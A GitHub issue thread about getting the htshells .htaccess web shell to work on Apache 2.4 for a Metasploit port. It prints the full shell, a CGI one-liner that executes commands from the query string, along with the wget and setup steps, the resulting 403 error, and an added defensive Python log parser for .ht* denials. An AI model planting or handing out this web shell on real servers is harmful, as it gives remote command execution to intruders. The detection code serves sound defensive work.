Closed h00die closed 2 years ago
htshells should work on Apache2. Did you uncomment the line per the comments in the file?
To set this up:
apt-get update
apt-get dist-upgrade
apt-get install apache2
a2enmod cgi
apache2ctl restart
confirm we're in working order:
ubuntu@ubuntu2004:~$ curl --silent 127.0.0.1 | head
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
wget -O /var/www/html/.htaccess https://raw.githubusercontent.com/wireghoul/htshells/master/shell/mod_cgi.shell.bash.htaccess
chmod +x /var/www/html/.htaccess
sed -i 's/# Require all granted/ Require all granted/' /var/www/html/.htaccess
Double check we're all good:
ubuntu@ubuntu2004:~$ cat /var/www/html/.htaccess
#!/bin/sh
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# IMPORTANT: Needs chmod +x to run
# Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a)
# Big shout out to the rosetta code website which provided the example below!
# This is considered a line spanning comment in apache and not by shell #winning \
echo -en "Content-Type: text/plain\r\n\r\n";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "\$ $cmd";$cmd 2>&1;exit
# The exit ensures we never reach the following lines which would break the shell parser
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
Require all granted
Order allow,deny
Allow from all
</Files>
# Enable CGI
Options +ExecCGI
#Make apache treat .htaccess as a cgi file
AddHandler cgi-script .htaccess
apache2ctl restart
(just to be certain everything is correct)
curl --silent "http://127.0.0.1/.htaccess?whoami" | head
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
ubuntu@ubuntu2004:~$ tail -n 1 /var/log/apache2/error.log
[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess
All changes to the server are listed above. However, for the sake of consistency, here's the only enabled site config:
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Thus, it seems the default config is blocking this in some way, shape or form. I spent some time trying to debug, but didn't make any progress.
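From the defender's side, the 403 and the AH01630 error.log entry shown above are exactly what an attempt to fetch a .htaccess or .htpasswd file over HTTP looks like while the server's deny rule for ".ht*" files is holding. The following parser is an added example (editor's code, not part of the htshells project or this thread) that reads Apache 2.4 error.log lines in the format quoted above and reports AH01630 denials whose target file name starts with ".ht", grouped by client address. The log lines embedded in it are constructed for the example: the first is the one quoted in the thread, the other three are made up to exercise an IPv6 client, a non-".ht" denial and a line without a client field.

```python
import os
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Apache 2.4 error.log layout, as in the line quoted in the thread:
#   [timestamp] [module:level] [pid N:tid N] [client ADDR:PORT] AHxxxxx: message
# The [client ...] field and the AH code are optional because notices
# written at startup carry neither.
ERROR_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] "
    r"\[(?P<module>[A-Za-z0-9_]+):(?P<level>[a-z0-9]+)\] "
    r"\[pid (?P<pid>\d+)(?::tid (?P<tid>\d+))?\] "
    r"(?:\[client (?P<client>[^\]]+)\] )?"
    r"(?:(?P<code>AH\d{5}): )?(?P<msg>.*)$"
)

# Constructed sample log: line 1 is the denial quoted in the thread, the rest
# are made up for this example (startup notice, IPv6 client, non-.ht denial).
SAMPLE_LOG = """\
[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess
[Sat Jan 08 15:24:07.000001 2022] [mpm_event:notice] [pid 3031:tid 139833246701312] AH00489: Apache/2.4.41 (Ubuntu) configured -- resuming normal operations
[Sat Jan 08 15:25:10.111111 2022] [authz_core:error] [pid 3034:tid 139833238308608] [client ::1:50122] AH01630: client denied by server configuration: /var/www/html/.htpasswd
[Sat Jan 08 15:26:00.222222 2022] [authz_core:error] [pid 3034:tid 139833238308608] [client 127.0.0.1:50123] AH01630: client denied by server configuration: /var/www/html/private/index.html
"""


@dataclass(frozen=True)
class Denial:
    ts: str
    client_ip: str
    path: str


def parse_line(line: str) -> Optional[dict]:
    """Split one error.log line into its fields, or return None if it does not match."""
    m = ERROR_LINE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def client_ip(client: str) -> str:
    """Apache appends ':PORT' to both IPv4 and IPv6 addresses; strip only the port."""
    return client.rsplit(":", 1)[0]


def find_dotht_denials(lines: Iterable[str]) -> List[Denial]:
    """Return every AH01630 denial whose denied file name begins with '.ht'."""
    hits: List[Denial] = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["code"] != "AH01630" or not rec["client"]:
            continue
        # The AH01630 message ends with the filesystem path that was denied.
        path = rec["msg"].rsplit(": ", 1)[-1]
        if os.path.basename(path).startswith(".ht"):
            hits.append(Denial(rec["ts"], client_ip(rec["client"]), path))
    return hits


def count_by_client(hits: Iterable[Denial]) -> Dict[str, int]:
    """Number of .ht* denials per client address, for a quick triage view."""
    return dict(Counter(h.client_ip for h in hits))


if __name__ == "__main__":
    found = find_dotht_denials(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"{h.ts}  {h.client_ip:<12} {h.path}")
    print(count_by_client(found))
```

Run against a real file with `find_dotht_denials(open("/var/log/apache2/error.log"))`. A denial here means the request never reached a handler; a successful request for a ".ht*" path would show up in access.log with a 200 instead, so both logs are worth watching.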
any updates?
Sorry, there is no unpaid tech support for this project. Between this talk (https://youtu.be/p1aCTBZrIOw) the Apache documentation and your server logs you should be able to figure it out.
In most real-world scenarios I've seen, you usually only get one shot at generating the correct htaccess file for the server config in use. Or you can write a specific exploit for a known configuration. Tbh I'd rather not see htshells as a payload function in metasploit, as I fear that will just generate a large number of support requests from users who had their exploit fail and use GitHub to demand answers.
I'm looking to port this to metasploit, however on an Ubuntu 20.04 Apache 2.4.41 box with https://github.com/wireghoul/htshells/blob/master/shell/mod_cgi.shell.bash.htaccess I'm getting
AH01630: client denied by server configuration: /var/www/html/.htaccess